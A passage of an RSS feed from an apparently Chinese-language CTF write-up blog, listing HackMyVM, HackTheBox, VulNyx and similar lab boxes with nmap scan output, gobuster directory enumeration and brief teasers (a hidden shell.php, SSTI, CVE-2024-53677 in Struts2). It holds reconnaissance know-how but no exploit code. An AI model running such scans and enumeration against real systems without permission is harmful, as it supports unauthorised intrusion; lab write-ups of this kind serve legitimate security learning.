|   3072 0d:09:9d:0f:dc:43:54:cd:39:a9:e2:d6:81:74:40:e8 (RSA)
|   256 09:d0:f6:52:00:3f:21:51:19:b1:c6:7a:f4:ff:21:01 (ECDSA)
|_  256 19:e0:b3:72:bd:e9:1e:8d:4c:c4:fd:1f:da:3f:a5:cf (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: The Walking Dead - CTF
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;访问网页，发现有一个隐藏的&lt;strong&gt;shell.php&lt;/strong&gt;&lt;/p&gt;</description>
    </item>
    <item>
      <title>Thehackerslabs-Black Gold</title>
      <link>https://www.hyhforever.top/posts/2025/04/thehackerslabs-black-gold/</link>
      <pubDate>Tue, 08 Apr 2025 00:00:00 +0000</pubDate>
      <guid>https://www.hyhforever.top/posts/2025/04/thehackerslabs-black-gold/</guid>
      <description>&lt;h2 id=&#34;box-info&#34;&gt;Box Info&lt;/h2&gt;
&lt;table&gt;
  &lt;thead&gt;
      &lt;tr&gt;
          &lt;th&gt;OS&lt;/th&gt;
          &lt;th&gt;Windows&lt;/th&gt;
      &lt;/tr&gt;
  &lt;/thead&gt;
  &lt;tbody&gt;
      &lt;tr&gt;
          &lt;td&gt;Difficulty&lt;/td&gt;
          &lt;td&gt;Hard&lt;/td&gt;
      &lt;/tr&gt;
  &lt;/tbody&gt;
&lt;/table&gt;
&lt;h2 id=&#34;nmap&#34;&gt;Nmap&lt;/h2&gt;
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;[root@kali] /home/kali  
❯ nmap 192.168.56.10 -sV -A -p-

PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
80/tcp    open  http          Microsoft IIS httpd 10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title:  Neptune 
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-04-08 07:26:35Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: neptune.thl0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: neptune.thl0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf        .NET Message Framing
49664/tcp open  msrpc         Microsoft Windows RPC
49670/tcp open  msrpc         Microsoft Windows RPC
53459/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
53460/tcp open  msrpc         Microsoft Windows RPC
53470/tcp open  msrpc         Microsoft Windows RPC
53479/tcp open  msrpc         Microsoft Windows RPC
MAC Address: 08:00:27:37:4E:C0 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2022|11|2016 (97%)
OS CPE: cpe:/o:microsoft:windows_server_2016
Aggressive OS guesses: Microsoft Windows Server 2022 (97%), Microsoft Windows 11 21H2 (91%), Microsoft Windows Server 2016 (91%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2025-04-08T07:27:27
|_  start_date: N/A
|_nbstat: NetBIOS name: DC01, NetBIOS user: &amp;lt;unknown&amp;gt;, NetBIOS MAC: 08:00:27:37:4e:c0 (Oracle VirtualBox virtual NIC)
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;修改**/etc/hosts**&lt;/p&gt;</description>
    </item>
    <item>
      <title>VulNyx-Matrix</title>
      <link>https://www.hyhforever.top/posts/2025/04/vulnyx-matrix/</link>
      <pubDate>Tue, 08 Apr 2025 00:00:00 +0000</pubDate>
      <guid>https://www.hyhforever.top/posts/2025/04/vulnyx-matrix/</guid>
      <description>&lt;h2 id=&#34;box-info&#34;&gt;Box Info&lt;/h2&gt;
&lt;table&gt;
  &lt;thead&gt;
      &lt;tr&gt;
          &lt;th&gt;OS&lt;/th&gt;
          &lt;th&gt;Linux&lt;/th&gt;
      &lt;/tr&gt;
  &lt;/thead&gt;
  &lt;tbody&gt;
      &lt;tr&gt;
          &lt;td&gt;Difficulty&lt;/td&gt;
          &lt;td&gt;Medium&lt;/td&gt;
      &lt;/tr&gt;
  &lt;/tbody&gt;
&lt;/table&gt;
&lt;h2 id=&#34;nmap&#34;&gt;Nmap&lt;/h2&gt;
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;[root@kali] /home/kali/Matrix  
❯ nmap 192.168.56.141 -sV -A -p-

22/tcp open  ssh     OpenSSH 9.2p1 Debian 2+deb12u4 (protocol 2.0)
| ssh-hostkey: 
|   256 67:78:c9:d2:e3:ff:be:fc:9e:13:9a:af:9d:59:17:66 (ECDSA)
|_  256 1a:78:b1:e6:f1:f0:d1:b3:ab:c8:3f:95:fd:46:52:67 (ED25519)
80/tcp open  http    Apache httpd 2.4.62 ((Debian))
|_http-server-header: Apache/2.4.62 (Debian)
|_http-title: Enter The Matrix
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;&lt;a data-fancybox=&#34;gallery&#34; href=&#34;https://www.hyhforever.top/posts/2025/04/vulnyx-matrix/images/image-46.png&#34; data-caption=&#34;&#34;&gt;
&lt;img loading=&#34;lazy&#34; src=&#34;https://www.hyhforever.top/posts/2025/04/vulnyx-matrix/images/image-46.png&#34;&gt;
&lt;/a&gt;&lt;/p&gt;
&lt;h2 id=&#34;gobuster&#34;&gt;Gobuster&lt;/h2&gt;
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;[root@kali] /home/kali/Matrix  
❯ gobuster dir -u http://192.168.56.141/ -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt   -x .pcap 
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) &amp;amp; Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.141/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              pcap
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/trinity.pcap         (Status: 200) [Size: 146389]
/server-status        (Status: 403) [Size: 279]
Progress: 441120 / 441122 (100.00%)
===============================================================
Finished
===============================================================
&lt;/code&gt;&lt;/pre&gt;&lt;h2 id=&#34;exiftool&#34;&gt;Exiftool&lt;/h2&gt;
&lt;p&gt;进行流量分析&lt;/p&gt;</description>
    </item>
    <item>
      <title>Thehackerslabs-B.I.G</title>
      <link>https://www.hyhforever.top/posts/2025/04/thehackerslabs-b-i-g/</link>
      <pubDate>Sat, 05 Apr 2025 00:00:00 +0000</pubDate>
      <guid>https://www.hyhforever.top/posts/2025/04/thehackerslabs-b-i-g/</guid>
      <description>&lt;h2 id=&#34;box-info&#34;&gt;Box Info&lt;/h2&gt;
&lt;table&gt;
  &lt;thead&gt;
      &lt;tr&gt;
          &lt;th&gt;OS&lt;/th&gt;
          &lt;th&gt;Windows&lt;/th&gt;
      &lt;/tr&gt;
  &lt;/thead&gt;
  &lt;tbody&gt;
      &lt;tr&gt;
          &lt;td&gt;Difficulty&lt;/td&gt;
          &lt;td&gt;Hard&lt;/td&gt;
      &lt;/tr&gt;
  &lt;/tbody&gt;
&lt;/table&gt;
&lt;h2 id=&#34;nmap&#34;&gt;Nmap&lt;/h2&gt;
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;[root@kali] /home/kali  
❯ nmap 192.168.212.4 -sV -A -p-

PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
80/tcp    open  http          Microsoft IIS httpd 10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-title: Site doesn&amp;#39;t have a title (text/html).
|_http-server-header: Microsoft-IIS/10.0
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-04-05 23:20:54Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: bbr.thl, Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: bbr.thl, Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp  open  mc-nmf        .NET Message Framing
47001/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
49664/tcp open  msrpc         Microsoft Windows RPC
49665/tcp open  msrpc         Microsoft Windows RPC
49666/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
49669/tcp open  msrpc         Microsoft Windows RPC
49670/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49671/tcp open  msrpc         Microsoft Windows RPC
49673/tcp open  msrpc         Microsoft Windows RPC
49676/tcp open  msrpc         Microsoft Windows RPC
49686/tcp open  msrpc         Microsoft Windows RPC
57043/tcp open  msrpc         Microsoft Windows RPC
MAC Address: 08:00:27:29:23:16 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Microsoft Windows 2016
OS CPE: cpe:/o:microsoft:windows_server_2016
OS details: Microsoft Windows Server 2016 build 10586 - 14393
Network Distance: 1 hop
Service Info: Host: BIG; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 15h54m38s
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
|_nbstat: NetBIOS name: BIG, NetBIOS user: &amp;lt;unknown&amp;gt;, NetBIOS MAC: 08:00:27:29:23:16 (Oracle VirtualBox virtual NIC)
| smb2-time: 
|   date: 2025-04-05T23:21:49
|_  start_date: 2025-04-05T19:55:29
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;将&lt;strong&gt;bbr.thl&lt;/strong&gt;添加到**/etc/hosts**&lt;/p&gt;</description>
    </item>
    <item>
      <title>HackMyVM-Todd</title>
      <link>https://www.hyhforever.top/posts/2025/04/hackmyvm-todd/</link>
      <pubDate>Wed, 02 Apr 2025 00:00:00 +0000</pubDate>
      <guid>https://www.hyhforever.top/posts/2025/04/hackmyvm-todd/</guid>
      <description>&lt;h2 id=&#34;box-info&#34;&gt;Box Info&lt;/h2&gt;
&lt;table&gt;
  &lt;thead&gt;
      &lt;tr&gt;
          &lt;th&gt;OS&lt;/th&gt;
          &lt;th&gt;Linux&lt;/th&gt;
      &lt;/tr&gt;
  &lt;/thead&gt;
  &lt;tbody&gt;
      &lt;tr&gt;
          &lt;td&gt;Difficulty&lt;/td&gt;
          &lt;td&gt;Easy&lt;/td&gt;
      &lt;/tr&gt;
  &lt;/tbody&gt;
&lt;/table&gt;
&lt;h2 id=&#34;nmap&#34;&gt;Nmap&lt;/h2&gt;
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;[root@kali] /home/kali/Todd  
❯ nmap 192.168.56.137 -sV -A  -p-

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 93:a4:92:55:72:2b:9b:4a:52:66:5c:af:a9:83:3c:fd (RSA)
|   256 1e:a7:44:0b:2c:1b:0d:77:83:df:1d:9f:0e:30:08:4d (ECDSA)
|_  256 d0:fa:9d:76:77:42:6f:91:d3:bd:b5:44:72:a7:c9:71 (ED25519)
80/tcp open  http    Apache httpd 2.4.59 ((Debian))
|_http-title: Mindful Listening
|_http-server-header: Apache/2.4.59 (Debian)
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;页面没有任何可以用的信息&lt;/p&gt;
&lt;p&gt;然后再次进行&lt;strong&gt;Nmap&lt;/strong&gt;，发现多了几个端口&lt;/p&gt;</description>
    </item>
    <item>
      <title>VulnVM-Search</title>
      <link>https://www.hyhforever.top/posts/2025/04/vulnvm-search/</link>
      <pubDate>Wed, 02 Apr 2025 00:00:00 +0000</pubDate>
      <guid>https://www.hyhforever.top/posts/2025/04/vulnvm-search/</guid>
      <description>&lt;h2 id=&#34;box-info&#34;&gt;Box Info&lt;/h2&gt;
&lt;table&gt;
  &lt;thead&gt;
      &lt;tr&gt;
          &lt;th&gt;OS&lt;/th&gt;
          &lt;th&gt;Linux&lt;/th&gt;
      &lt;/tr&gt;
  &lt;/thead&gt;
  &lt;tbody&gt;
      &lt;tr&gt;
          &lt;td&gt;Difficulty&lt;/td&gt;
          &lt;td&gt;Easy&lt;/td&gt;
      &lt;/tr&gt;
  &lt;/tbody&gt;
&lt;/table&gt;
&lt;h2 id=&#34;nmap&#34;&gt;Nmap&lt;/h2&gt;
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;[root@kali] /home/kali/Search  
❯ nmap 192.168.56.136 -sV -A  -p-

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 9.2p1 Debian 2+deb12u5 (protocol 2.0)
| ssh-hostkey: 
|   256 39:0d:70:e0:55:cb:20:de:ad:f7:10:d8:1f:76:4d:9d (ECDSA)
|_  256 df:e2:94:52:e9:3d:eb:69:2d:b4:a5:a9:2c:3e:63:46 (ED25519)
80/tcp open  http    Apache httpd 2.4.62 ((Debian))
|_http-server-header: Apache/2.4.62 (Debian)
|_http-title: Apache2 Debian Default Page: It works
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;&lt;a data-fancybox=&#34;gallery&#34; href=&#34;https://www.hyhforever.top/posts/2025/04/vulnvm-search/images/image.png&#34; data-caption=&#34;&#34;&gt;
&lt;img loading=&#34;lazy&#34; src=&#34;https://www.hyhforever.top/posts/2025/04/vulnvm-search/images/image.png&#34;&gt;
&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;得到用户名是&lt;strong&gt;support&lt;/strong&gt;&lt;/p&gt;</description>
    </item>
    <item>
      <title>HTB-Haze</title>
      <link>https://www.hyhforever.top/posts/2025/03/htb-haze/</link>
      <pubDate>Mon, 31 Mar 2025 00:00:00 +0000</pubDate>
      <guid>https://www.hyhforever.top/posts/2025/03/htb-haze/</guid>
      <description>&lt;h2 id=&#34;box-info&#34;&gt;Box Info&lt;/h2&gt;
&lt;table&gt;
  &lt;thead&gt;
      &lt;tr&gt;
          &lt;th&gt;OS&lt;/th&gt;
          &lt;th&gt;Windows&lt;/th&gt;
      &lt;/tr&gt;
  &lt;/thead&gt;
  &lt;tbody&gt;
      &lt;tr&gt;
          &lt;td&gt;Difficulty&lt;/td&gt;
          &lt;td&gt;Hard&lt;/td&gt;
      &lt;/tr&gt;
  &lt;/tbody&gt;
&lt;/table&gt;
&lt;h2 id=&#34;nmap&#34;&gt;Nmap&lt;/h2&gt;
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;[root@kali] /home/kali  
❯ nmap Haze.htb -sV -A                      

PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos 
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: haze.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc01.haze.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:&amp;lt;unsupported&amp;gt;, DNS:dc01.haze.htb
| Not valid before: 2025-03-05T07:12:20
|_Not valid after:  2026-03-05T07:12:20
|_ssl-date: TLS randomness does not represent time
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: haze.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc01.haze.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:&amp;lt;unsupported&amp;gt;, DNS:dc01.haze.htb
| Not valid before: 2025-03-05T07:12:20
|_Not valid after:  2026-03-05T07:12:20
|_ssl-date: TLS randomness does not represent time
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: haze.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=dc01.haze.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:&amp;lt;unsupported&amp;gt;, DNS:dc01.haze.htb
| Not valid before: 2025-03-05T07:12:20
|_Not valid after:  2026-03-05T07:12:20
3269/tcp open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: haze.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=dc01.haze.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:&amp;lt;unsupported&amp;gt;, DNS:dc01.haze.htb
| Not valid before: 2025-03-05T07:12:20
|_Not valid after:  2026-03-05T07:12:20
8000/tcp open  http          Splunkd httpd
| http-title: Site doesn&amp;#39;t have a title (text/html; charset=UTF-8).
|_Requested resource was http://Haze.htb:8000/en-US/account/login?return_to=%2Fen-US%2F
|_http-server-header: Splunkd
| http-robots.txt: 1 disallowed entry 
|_/
8088/tcp open  ssl/http      Splunkd httpd
|_http-server-header: Splunkd
|_http-title: 404 Not Found
| ssl-cert: Subject: commonName=SplunkServerDefaultCert/organizationName=SplunkUser
| Not valid before: 2025-03-05T07:29:08
|_Not valid after:  2028-03-04T07:29:08
| http-robots.txt: 1 disallowed entry 
|_/
8089/tcp open  ssl/http      Splunkd httpd
|_http-title: splunkd
| ssl-cert: Subject: commonName=SplunkServerDefaultCert/organizationName=SplunkUser
| Not valid before: 2025-03-05T07:29:08
|_Not valid after:  2028-03-04T07:29:08
| http-robots.txt: 1 disallowed entry 
|_/
|_http-server-header: Splunkd
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;&lt;strong&gt;dc01.haze.htb&lt;/strong&gt;添加到**/etc/hosts**&lt;/p&gt;</description>
    </item>
    <item>
      <title>HackMyVM-KrustyKrab</title>
      <link>https://www.hyhforever.top/posts/2025/03/hackmyvm-krustykrab/</link>
      <pubDate>Thu, 27 Mar 2025 00:00:00 +0000</pubDate>
      <guid>https://www.hyhforever.top/posts/2025/03/hackmyvm-krustykrab/</guid>
      <description>&lt;h2 id=&#34;box-info&#34;&gt;Box Info&lt;/h2&gt;
&lt;table&gt;
  &lt;thead&gt;
      &lt;tr&gt;
          &lt;th&gt;OS&lt;/th&gt;
          &lt;th&gt;Linux&lt;/th&gt;
      &lt;/tr&gt;
  &lt;/thead&gt;
  &lt;tbody&gt;
      &lt;tr&gt;
          &lt;td&gt;Difficulty&lt;/td&gt;
          &lt;td&gt;Easy&lt;/td&gt;
      &lt;/tr&gt;
  &lt;/tbody&gt;
&lt;/table&gt;
&lt;h2 id=&#34;nmap&#34;&gt;Nmap&lt;/h2&gt;
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;[root@kali] /home/kali  
❯ nmap 192.168.56.131 -sV -A  -p-

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 9.2p1 Debian 2 (protocol 2.0)
| ssh-hostkey: 
|   256 f6:91:6b:ad:ea:ad:1d:b9:44:09:d8:74:a3:02:38:35 (ECDSA)
|_  256 b6:66:2f:f0:4c:26:7f:7d:14:ea:b3:62:09:64:a7:94 (ED25519)
80/tcp open  http    Apache httpd 2.4.62 ((Debian))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.62 (Debian)
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;进入&lt;strong&gt;80&lt;/strong&gt;端口查看，是一个&lt;strong&gt;apache&lt;/strong&gt;默认页&lt;/p&gt;</description>
    </item>
    <item>
      <title>HTB-Code</title>
      <link>https://www.hyhforever.top/posts/2025/03/htb-code/</link>
      <pubDate>Sun, 23 Mar 2025 00:00:00 +0000</pubDate>
      <guid>https://www.hyhforever.top/posts/2025/03/htb-code/</guid>
      <description>&lt;h2 id=&#34;box-info&#34;&gt;Box Info&lt;/h2&gt;
&lt;table&gt;
  &lt;thead&gt;
      &lt;tr&gt;
          &lt;th&gt;OS&lt;/th&gt;
          &lt;th&gt;Linux&lt;/th&gt;
      &lt;/tr&gt;
  &lt;/thead&gt;
  &lt;tbody&gt;
      &lt;tr&gt;
          &lt;td&gt;Difficulty&lt;/td&gt;
          &lt;td&gt;Easy&lt;/td&gt;
      &lt;/tr&gt;
  &lt;/tbody&gt;
&lt;/table&gt;
&lt;h2 id=&#34;nmap&#34;&gt;Nmap&lt;/h2&gt;
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;[root@kali] /home/kali/Code  
❯ nmap code.htb -sV -A                 

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.12 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 b5:b9:7c:c4:50:32:95:bc:c2:65:17:df:51:a2:7a:bd (RSA)
|   256 94:b5:25:54:9b:68:af:be:40:e1:1d:a8:6b:85:0d:01 (ECDSA)
|_  256 12:8c:dc:97:ad:86:00:b4:88:e2:29:cf:69:b5:65:96 (ED25519)
5000/tcp open  http    Gunicorn 20.0.4
|_http-title: Python Code Editor
|_http-server-header: gunicorn/20.0.4
&lt;/code&gt;&lt;/pre&gt;&lt;h2 id=&#34;own-www-data&#34;&gt;Own www-data&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href=&#34;https://hello-ctf.com/hc-web/ssti/#_7&#34;&gt;SSTI 注入 - Hello CTF&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;进入到&lt;strong&gt;5000&lt;/strong&gt;端口是一个&lt;strong&gt;python&lt;/strong&gt;代码执行窗口&lt;/p&gt;</description>
    </item>
    <item>
      <title>HTB-Strutted</title>
      <link>https://www.hyhforever.top/posts/2025/03/htb-strutted/</link>
      <pubDate>Sat, 22 Mar 2025 00:00:00 +0000</pubDate>
      <guid>https://www.hyhforever.top/posts/2025/03/htb-strutted/</guid>
      <description>&lt;h2 id=&#34;box-info&#34;&gt;Box Info&lt;/h2&gt;
&lt;table&gt;
  &lt;thead&gt;
      &lt;tr&gt;
          &lt;th&gt;OS&lt;/th&gt;
          &lt;th&gt;Linux&lt;/th&gt;
      &lt;/tr&gt;
  &lt;/thead&gt;
  &lt;tbody&gt;
      &lt;tr&gt;
          &lt;td&gt;Difficulty&lt;/td&gt;
          &lt;td&gt;Medium&lt;/td&gt;
      &lt;/tr&gt;
  &lt;/tbody&gt;
&lt;/table&gt;
&lt;h2 id=&#34;nmap&#34;&gt;Nmap&lt;/h2&gt;
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;[root@kali] /home/kali/Strutted  
❯ nmap strutted.htb -sV    

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    nginx 1.18.0 (Ubuntu)
&lt;/code&gt;&lt;/pre&gt;&lt;h2 id=&#34;cve-2024-53677&#34;&gt;CVE-2024-53677 &lt;/h2&gt;
&lt;p&gt;存在一个&lt;strong&gt;Download&lt;/strong&gt;路由可以下载到网站源码&lt;/p&gt;
&lt;p&gt;查看&lt;strong&gt;pom.xml&lt;/strong&gt;发现使用的是&lt;strong&gt;struts2 6.3.0.1&lt;/strong&gt;&lt;/p&gt;</description>
    </item>
    <item>
      <title>VulnVM-Interceptor</title>
      <link>https://www.hyhforever.top/posts/2025/03/vulnvm-interceptor/</link>
      <pubDate>Fri, 21 Mar 2025 00:00:00 +0000</pubDate>
      <guid>https://www.hyhforever.top/posts/2025/03/vulnvm-interceptor/</guid>
      <description>&lt;h2 id=&#34;box-info&#34;&gt;Box Info&lt;/h2&gt;
&lt;table&gt;
  &lt;thead&gt;
      &lt;tr&gt;
          &lt;th&gt;OS&lt;/th&gt;
          &lt;th&gt;Linux&lt;/th&gt;
      &lt;/tr&gt;
  &lt;/thead&gt;
  &lt;tbody&gt;
      &lt;tr&gt;
          &lt;td&gt;Difficulty&lt;/td&gt;
          &lt;td&gt;Hard&lt;/td&gt;
      &lt;/tr&gt;
  &lt;/tbody&gt;
&lt;/table&gt;
&lt;h2 id=&#34;nmap&#34;&gt;Nmap&lt;/h2&gt;
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;[root@kali] /home/kali/Interceptor  
❯ nmap 192.168.56.123 -sV -A  -p- 

PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
80/tcp open  http    Apache httpd 2.4.62 ((Debian))
|_http-title: Apache2 Debian Default Page: It works
|_http-server-header: Apache/2.4.62 (Debian)
&lt;/code&gt;&lt;/pre&gt;&lt;h2 id=&#34;gobuster&#34;&gt;Gobuster&lt;/h2&gt;
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;[root@kali] /home/kali/Interceptor  
❯ gobuster dir -u http://192.168.56.123 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt  -x php,html,txt        
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) &amp;amp; Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.123
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              php,html,txt
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.html                (Status: 403) [Size: 279]
/.php                 (Status: 403) [Size: 279]
/index.html           (Status: 200) [Size: 10701]
/wordpress            (Status: 301) [Size: 320] [--&amp;gt; http://192.168.56.123/wordpress/]
/backup               (Status: 301) [Size: 317] [--&amp;gt; http://192.168.56.123/backup/]
/.html                (Status: 403) [Size: 279]
/.php                 (Status: 403) [Size: 279]
/server-status        (Status: 403) [Size: 279]
/fping.php            (Status: 200) [Size: 1958]
Progress: 882240 / 882244 (100.00%)
===============================================================
Finished
===============================================================
&lt;/code&gt;&lt;/pre&gt;&lt;h2 id=&#34;crack-zip&#34;&gt;Crack ZIP&lt;/h2&gt;
&lt;p&gt;在**/backup&lt;strong&gt;里发现一个压缩包，应该是涉及到了&lt;/strong&gt;/fping**这个路由的。&lt;/p&gt;</description>
    </item>
    <item>
      <title>HTB-TheFrizz</title>
      <link>https://www.hyhforever.top/posts/2025/03/htb-thefrizz/</link>
      <pubDate>Mon, 17 Mar 2025 00:00:00 +0000</pubDate>
      <guid>https://www.hyhforever.top/posts/2025/03/htb-thefrizz/</guid>
      <description>&lt;h2 id=&#34;box-info&#34;&gt;Box Info&lt;/h2&gt;
&lt;table&gt;
  &lt;thead&gt;
      &lt;tr&gt;
          &lt;th&gt;OS&lt;/th&gt;
          &lt;th&gt;Windows&lt;/th&gt;
      &lt;/tr&gt;
  &lt;/thead&gt;
  &lt;tbody&gt;
      &lt;tr&gt;
          &lt;td&gt;Difficulty&lt;/td&gt;
          &lt;td&gt;Medium&lt;/td&gt;
      &lt;/tr&gt;
  &lt;/tbody&gt;
&lt;/table&gt;
&lt;h2 id=&#34;nmap&#34;&gt;Nmap&lt;/h2&gt;
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;[root@kali] /home/kali/TheFrizz  
❯ nmap thefrizz.htb -sV -A                                                                                                                                

PORT     STATE SERVICE       VERSION
22/tcp   open  ssh           OpenSSH for_Windows_9.5 (protocol 2.0)
53/tcp   open  domain        Simple DNS Plus
80/tcp   open  http          Apache httpd 2.4.58 (OpenSSL/3.1.3 PHP/8.2.12)
|_http-title: Did not follow redirect to http://frizzdc.frizz.htb/home/
|_http-server-header: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos 
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: frizz.htb0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: frizz.htb0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;将&lt;strong&gt;frizz.htb&lt;/strong&gt;添加到**/etc/hosts**&lt;/p&gt;</description>
    </item>
    <item>
      <title>VulNyx-Loweb</title>
      <link>https://www.hyhforever.top/posts/2025/03/vulnyx-loweb/</link>
